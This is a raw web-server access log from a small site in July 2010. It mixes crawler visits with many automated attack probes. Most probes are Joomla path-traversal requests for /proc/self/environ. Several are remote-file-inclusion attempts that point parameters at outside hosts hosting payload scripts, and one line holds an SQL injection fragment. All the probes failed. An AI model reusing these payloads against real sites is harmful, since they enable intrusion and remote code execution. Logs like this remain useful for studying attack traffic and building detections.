41.78.28.104 - - [28/Jul/2010:02:40:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
41.78.28.104 - - [28/Jul/2010:02:40:13 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
66.71.245.122 - - [28/Jul/2010:02:43:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
66.71.245.122 - - [28/Jul/2010:02:43:29 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
67.159.44.97 - - [28/Jul/2010:02:49:46 -0700] "GET /logs/access.log//includes/tgpinc.php?DOCUMENT_ROOT=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.159.44.97 - - [28/Jul/2010:02:49:46 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.159.44.97 - - [28/Jul/2010:02:49:46 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
93.232.204.77 - - [28/Jul/2010:02:51:32 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
93.232.204.77 - - [28/Jul/2010:02:51:32 -0700] "GET /logs/access.log//includes/tgpinc.php?DOCUMENT_ROOT=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
93.232.204.77 - - [28/Jul/2010:02:51:32 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
93.125.99.2 - - [28/Jul/2010:02:53:18 -0700] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
93.125.99.2 - - [28/Jul/2010:02:53:18 -0700] "GET /logs/access.log//includes/tgpinc.php?DOCUMENT_ROOT=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
93.125.99.2 - - [28/Jul/2010:02:53:18 -0700] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.202.10.86 - - [28/Jul/2010:02:57:53 -0700] "GET /logs/ HTTP/1.0" 200 1923 "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:03:03:09 -0700] "GET /logs/access_100329.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:03:03:09 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:03:03:10 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.121.67.226 - - [28/Jul/2010:03:03:16 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.67.226 - - [28/Jul/2010:03:03:16 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
78.41.233.128 - - [28/Jul/2010:03:03:41 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
78.41.233.128 - - [28/Jul/2010:03:03:41 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.207 - - [28/Jul/2010:03:04:30 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.105 - - [28/Jul/2010:03:07:16 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
213.26.134.7 - - [28/Jul/2010:03:17:30 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent" "www.redneckmba.com"
123.204.132.58 - - [28/Jul/2010:03:17:46 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
91.121.67.226 - - [28/Jul/2010:03:20:37 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.67.226 - - [28/Jul/2010:03:20:37 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
78.41.233.128 - - [28/Jul/2010:03:20:54 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
78.41.233.128 - - [28/Jul/2010:03:20:54 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
91.121.67.226 - - [28/Jul/2010:03:25:02 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.67.226 - - [28/Jul/2010:03:25:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
78.41.233.128 - - [28/Jul/2010:03:25:08 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
78.41.233.128 - - [28/Jul/2010:03:25:08 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
78.41.233.128 - - [28/Jul/2010:03:25:08 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
78.41.233.128 - - [28/Jul/2010:03:25:08 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
91.121.67.226 - - [28/Jul/2010:03:25:30 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.67.226 - - [28/Jul/2010:03:25:30 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
220.181.94.220 - - [28/Jul/2010:03:26:14 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.redneckmba.com"
220.181.94.220 - - [28/Jul/2010:03:26:24 -0700] "GET / HTTP/1.1" 200 779 "-" "Sogou-Test-Spider/4.0 (compatible; MSIE 5.5; Windows 98)" "www.redneckmba.com"
67.202.10.86 - - [28/Jul/2010:03:34:36 -0700] "GET / HTTP/1.0" 200 763 "-" "SheenBot/SheenBot-1.0.4 (Sheen web crawler)" "www.redneckmba.com"
76.13.123.195 - - [28/Jul/2010:03:40:30 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.121.191.5 - - [28/Jul/2010:03:40:31 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
76.13.114.106 - - [28/Jul/2010:03:44:10 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.121.191.5 - - [28/Jul/2010:03:44:22 -0700] "GET /logs/access.log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
174.121.191.5 - - [28/Jul/2010:03:44:22 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
174.121.191.5 - - [28/Jul/2010:03:44:22 -0700] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
87.98.217.83 - - [28/Jul/2010:03:45:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
66.163.171.207 - - [28/Jul/2010:03:51:18 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.98.217.83 - - [28/Jul/2010:03:54:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:03:58:50 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.123.133.162 - - [28/Jul/2010:03:58:50 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.123.133.162 - - [28/Jul/2010:03:58:51 -0700] "GET /logs/access_100712.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yuliana.zoomshare.com/files/2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
174.123.133.162 - - [28/Jul/2010:04:07:54 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:04:07:54 -0700] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:04:07:54 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [28/Jul/2010:04:22:13 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
62.44.82.118 - - [28/Jul/2010:04:30:43 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
66.163.171.205 - - [28/Jul/2010:04:37:24 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
62.44.82.118 - - [28/Jul/2010:04:43:07 -0700] "GET /logs/access.log//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.118 - - [28/Jul/2010:04:43:08 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
62.44.82.118 - - [28/Jul/2010:04:43:08 -0700] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
76.13.123.194 - - [28/Jul/2010:04:44:53 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.121.191.5 - - [28/Jul/2010:05:00:31 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
174.121.191.5 - - [28/Jul/2010:05:00:32 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
174.121.191.5 - - [28/Jul/2010:05:00:32 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
76.13.114.105 - - [28/Jul/2010:05:02:40 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.218.116.168 - - [28/Jul/2010:05:09:56 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.redneckmba.com"
208.64.68.228 - - [28/Jul/2010:05:11:23 -0700] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shafa.xp3.biz//botz/zfxid2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.64.68.228 - - [28/Jul/2010:05:11:23 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shafa.xp3.biz//botz/zfxid2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.64.68.228 - - [28/Jul/2010:05:11:23 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shafa.xp3.biz//botz/zfxid2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.64.68.228 - - [28/Jul/2010:05:12:23 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shafa.xp3.biz//botz/zfxid2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.64.68.228 - - [28/Jul/2010:05:12:23 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shafa.xp3.biz//botz/zfxid2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.64.68.228 - - [28/Jul/2010:05:12:23 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://shafa.xp3.biz//botz/zfxid2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.207 - - [28/Jul/2010:05:26:51 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.210.98.175 - - [28/Jul/2010:05:38:13 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.primer.hu/e107_languages/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.210.98.175 - - [28/Jul/2010:05:38:13 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.primer.hu/e107_languages/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.210.98.175 - - [28/Jul/2010:05:38:13 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.primer.hu/e107_languages/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [28/Jul/2010:05:43:34 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [28/Jul/2010:05:52:44 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
202.47.80.12 - - [28/Jul/2010:06:08:27 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [28/Jul/2010:06:08:27 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [28/Jul/2010:06:08:33 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [28/Jul/2010:06:08:33 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [28/Jul/2010:06:08:39 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [28/Jul/2010:06:08:39 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [28/Jul/2010:06:16:29 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [28/Jul/2010:06:16:29 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [28/Jul/2010:06:16:35 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [28/Jul/2010:06:16:35 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [28/Jul/2010:06:16:41 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.47.80.12 - - [28/Jul/2010:06:16:41 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.207 - - [28/Jul/2010:06:20:12 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [28/Jul/2010:06:28:50 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
114.45.68.124 - - [28/Jul/2010:06:39:56 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
76.13.123.194 - - [28/Jul/2010:07:07:39 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
114.45.51.101 - - [28/Jul/2010:07:07:51 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
66.163.171.205 - - [28/Jul/2010:07:14:57 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [28/Jul/2010:07:16:22 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.142.75.205 - - [28/Jul/2010:07:49:21 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
174.142.75.205 - - [28/Jul/2010:07:49:21 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:08:03:15 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:08:03:15 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:08:03:16 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [28/Jul/2010:08:08:16 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.123.133.162 - - [28/Jul/2010:08:13:04 -0700] "GET /logs/access_100614.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.187.169.8 - - [28/Jul/2010:08:14:06 -0700] "GET /logs/access_100621+and+0=1+union+select+.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)" "redneckmba.com"
66.163.171.207 - - [28/Jul/2010:08:14:40 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [28/Jul/2010:08:28:06 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
74.55.73.74 - - [28/Jul/2010:08:31:48 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
74.55.73.74 - - [28/Jul/2010:08:31:48 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
81.21.78.22 - - [28/Jul/2010:08:33:16 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
81.21.78.22 - - [28/Jul/2010:08:33:16 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.myjpconnelly.com/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
211.206.120.196 - - [28/Jul/2010:08:52:38 -0700] "GET /index.php?option=com_gcalendar&controller= HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.114.107 - - [28/Jul/2010:09:01:06 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
91.214.46.25 - - [28/Jul/2010:09:06:06 -0700] "GET /logs/access_100524.log HTTP/1.0" 404 - "http://www.redneckmba.com/logs/access_100524.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.redneckmba.com"
